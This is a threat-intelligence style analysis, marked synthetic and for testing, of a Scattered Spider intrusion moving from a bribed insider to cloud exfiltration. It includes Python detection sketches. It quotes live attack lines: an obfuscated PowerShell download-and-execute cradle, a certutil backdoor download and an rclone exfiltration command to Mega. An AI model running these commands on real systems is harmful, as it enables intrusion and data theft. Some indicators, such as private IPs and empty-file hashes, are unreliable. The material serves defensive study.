Scattered Spider from Insider Approved Phishing to Cloud Exfiltration While Living off the Land
NOTE: This is a synthetic analysis of a campaign used only for testing purposes.
Spida Killa Labs analyzed an attack in which a recruited insider provides the initial foothold, after which living-off-the-land tools are used to reach the organization's cloud services.
The attack, linked to the Scattered Spider threat actor, begins with the recruitment of an insider who is well positioned to facilitate the attack while blending in with regular activity. Once Scattered Spider has made contact, the insider is offered 1 BTC (69,644.70 USD) to click a designated link that arrives in a pre-arranged phishing email.
Clicking this link installs a version of the Splashtop Remote Monitoring and Management (RMM) software, giving Scattered Spider continuous access to the victim network under the insider's identity. The attacker used this Splashtop installation to move laterally through every RDP session and shared drive observed during a 37-day reconnaissance phase. As each new endpoint is compromised, Splashtop is installed on it to maintain access.
On each newly compromised endpoint, an arbitrary code execution vulnerability in Okta Verify (CVE-2024-0980) was used to obtain system access.
A second lateral movement method was observed: the attacker modified Excel files on shared drives so that a macro runs and yields further access. This macro executes the following PowerShell:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Which decodes to:
Powershell.exe -noexit $c1=(New-Object Net.We;
$c4=bClient).Downlo;
$c3=adString(http://185.7.214[.]7/PP91.PNG);
$JI=($c1,$c4,$c3 -Join);
I`E`X$JI|I`E`X
Although PP91.PNG (2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc), downloaded by the previous stage, carries a .PNG image extension, it is in fact another PowerShell script, this one without obfuscation.
The PowerShell in PP91.PNG downloads a backdoor with certutil.exe:
certutil.exe -urlcache -f http://10.0.0[.]5/ssd.dll C:\Users\Public\Documents\ssd.dll
saving it to C:\Users\Public\Documents\ssd.dll (63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9).
Each compromised endpoint has its Microsoft 365 tokens dumped by OfficeMemScraper.ps1 and exfiltrated; AWS credential files are exfiltrated as well.
The attacker then enumerates the endpoint for other files of interest using a script named cr0wnj3welz.ps1. Files this script judges important are exfiltrated to Mega[.]io with rclone.exe, which has been renamed to dumper.exe:
c:\Windows\system32\cmd.exe /C C:\Users\barne\dumper.exe config create remote mega user [redacted]@gmail.com pass [redacted]
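Every endpoint-side stage above runs through a signed Microsoft binary or a legitimately distributed tool, so the useful signal is in the command line and the PE metadata rather than the file name. What follows is an added detection sketch, not the report's tooling, run over constructed Sysmon-style process-creation events: the first three command lines reproduce the ones quoted in the analysis, the remaining two are benign controls, and the `original_file_name` field stands in for the OriginalFileName value Sysmon takes from PE version info. It flags certutil URL-cache downloads, an rclone remote being created for Mega under any binary name, a binary whose PE original name disagrees with its on-disk name, and hidden PowerShell combined with an execution-policy bypass.

```python
import re
from ntpath import basename

# Constructed Sysmon-style process-creation events (not from the report).
# pids 101-103 carry the command lines quoted in the analysis; 104-105 are benign.
# `original_file_name` stands in for the PE field Sysmon logs as OriginalFileName.
EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\certutil.exe", "original_file_name": "CertUtil.exe",
     "cmd": r"certutil.exe -urlcache -f http://10.0.0.5/ssd.dll C:\Users\Public\Documents\ssd.dll"},
    {"pid": 102, "image": r"C:\Users\barne\dumper.exe", "original_file_name": "rclone.exe",
     "cmd": r"C:\Users\barne\dumper.exe config create remote mega user [redacted]@gmail.com pass [redacted]"},
    {"pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "cmd": r"powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"},
    {"pid": 104, "image": r"C:\Windows\System32\certutil.exe", "original_file_name": "CertUtil.exe",
     "cmd": r"certutil.exe -hashfile C:\Users\barne\setup.msi SHA256"},
    {"pid": 105, "image": r"C:\Windows\System32\notepad.exe", "original_file_name": "NOTEPAD.EXE",
     "cmd": r"notepad.exe C:\Users\barne\notes.txt"},
]


def detect(event: dict) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    image = basename(event["image"]).lower()
    original = event.get("original_file_name", "").lower()
    cmd = event["cmd"]
    # certutil pulling a remote file into its URL cache (the ssd.dll stage)
    if image == "certutil.exe" and re.search(r"-urlcache\b.*\bhttps?://", cmd, re.I):
        hits.append("certutil_urlcache_download")
    # an rclone remote for Mega being configured, whatever the binary is called
    if re.search(r"\bconfig\s+create\s+\S+\s+mega\b", cmd, re.I):
        hits.append("rclone_mega_remote_created")
    # PE original name disagrees with the on-disk name (rclone.exe shipped as dumper.exe);
    # tune against the environment, since some legitimate installers also rename binaries
    if original and original != image:
        hits.append("renamed_binary")
    # hidden PowerShell window combined with an execution-policy bypass
    if image.startswith("powershell") and re.search(r"-w[a-z]*\s+hidden", cmd, re.I) \
            and re.search(r"-e(x[a-z]*|p)\s+bypass", cmd, re.I):
        hits.append("powershell_hidden_bypass")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map pid -> matched rules for every event that matched at least one rule."""
    results = {}
    for event in events:
        hits = detect(event)
        if hits:
            results[event["pid"]] = hits
    return results


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules)
```

The rclone rule deliberately ignores the image name and keys on the `config create <name> mega` argument shape, which is what survives the rename to dumper.exe; the renamed-binary rule then gives a second, independent hit on the same event.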
The attacker then sets Microsoft 365 SharePoint and OneDrive sharing on all files to “Anyone”, granting themselves access.
The attacker then downloads these files from 192.168.1[.]1 and 10.0.0[.]1.
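On the cloud side, setting SharePoint and OneDrive sharing to “Anyone” corresponds to anonymous links, which the Microsoft 365 unified audit log records as AnonymousLinkCreated operations; the later retrievals appear as FileDownloaded operations carrying the downloader's ClientIP. The following added example (not from the report) runs two checks over constructed records that use the audit log's field names but invented values: a user creating a burst of anonymous links inside a short window, and downloads from addresses outside a constructed egress allowlist. The two download source addresses are the ones named in the analysis.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records using unified audit log field names; every value is invented.
# The two download source addresses are the ones named in the analysis.
RECORDS = [
    {"CreationTime": "2024-05-02T09:00:05", "Operation": "AnonymousLinkCreated",
     "UserId": "insider@example.com", "ClientIP": "10.0.0.20",
     "ObjectId": "https://tenant.sharepoint.com/sites/finance/Q1.xlsx"},
    {"CreationTime": "2024-05-02T09:00:41", "Operation": "AnonymousLinkCreated",
     "UserId": "insider@example.com", "ClientIP": "10.0.0.20",
     "ObjectId": "https://tenant.sharepoint.com/sites/finance/Q2.xlsx"},
    {"CreationTime": "2024-05-02T09:01:12", "Operation": "AnonymousLinkCreated",
     "UserId": "insider@example.com", "ClientIP": "10.0.0.20",
     "ObjectId": "https://tenant.sharepoint.com/sites/hr/payroll.xlsx"},
    {"CreationTime": "2024-05-02T09:02:30", "Operation": "AnonymousLinkCreated",
     "UserId": "insider@example.com", "ClientIP": "10.0.0.20",
     "ObjectId": "https://tenant-my.sharepoint.com/personal/insider/Documents/keys.txt"},
    {"CreationTime": "2024-05-02T09:03:10", "Operation": "FileDownloaded",
     "UserId": "insider@example.com", "ClientIP": "192.168.1.1",
     "ObjectId": "https://tenant.sharepoint.com/sites/finance/Q1.xlsx"},
    {"CreationTime": "2024-05-02T09:03:40", "Operation": "FileDownloaded",
     "UserId": "insider@example.com", "ClientIP": "10.0.0.1",
     "ObjectId": "https://tenant.sharepoint.com/sites/hr/payroll.xlsx"},
    {"CreationTime": "2024-05-02T11:00:00", "Operation": "AnonymousLinkCreated",
     "UserId": "alice@example.com", "ClientIP": "10.0.0.30",
     "ObjectId": "https://tenant.sharepoint.com/sites/marketing/flyer.pdf"},
    {"CreationTime": "2024-05-02T11:05:00", "Operation": "FileDownloaded",
     "UserId": "alice@example.com", "ClientIP": "10.0.0.30",
     "ObjectId": "https://tenant.sharepoint.com/sites/marketing/flyer.pdf"},
]

# Constructed allowlist of known office/VPN egress addresses.
CORPORATE_EGRESS = {"10.0.0.20", "10.0.0.30"}


def mass_anonymous_sharing(records, threshold=3, window=timedelta(minutes=5)):
    """Users who created at least `threshold` 'Anyone' links inside one `window`.
    Returns {user: largest number of links seen in any such window}."""
    times_by_user = defaultdict(list)
    for r in records:
        if r["Operation"] == "AnonymousLinkCreated":
            times_by_user[r["UserId"]].append(datetime.fromisoformat(r["CreationTime"]))
    flagged = {}
    for user, times in times_by_user.items():
        times.sort()
        best = 0
        for i, start in enumerate(times):
            # count links from this one onward that fall within the window
            best = max(best, sum(1 for t in times[i:] if t - start <= window))
        if best >= threshold:
            flagged[user] = best
    return flagged


def downloads_from_unknown_ips(records, allowlist=CORPORATE_EGRESS):
    """(user, ip) pairs for FileDownloaded events from addresses not in the allowlist."""
    return sorted({(r["UserId"], r["ClientIP"]) for r in records
                   if r["Operation"] == "FileDownloaded" and r["ClientIP"] not in allowlist})


if __name__ == "__main__":
    print(mass_anonymous_sharing(RECORDS))
    print(downloads_from_unknown_ips(RECORDS))
```

A single anonymous link is routine in most tenants, which is why the first check counts links per user inside a sliding window rather than alerting on each one; the second check is only as good as the allowlist, so in practice it is fed from the organization's known egress ranges rather than a hard-coded set.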
IOCs
| Filename | SHA256 |
|---|---|
| C:\Users\Public\Documents\ssd.dll | 63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9 |
| PP91.PNG | 2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc |
| OfficeMemScraper.ps1 | |
| C:\Users\<USERNAME>\.aws\credentials | Varies |
| C:\Program Files (x86)\Okta\UpdateService\wintrust.dll | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| New_order.pdf | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
Addresses Used
185.7.214[.]7
192.168.1[.]1
10.0.0[.]1
10.0.0[.]5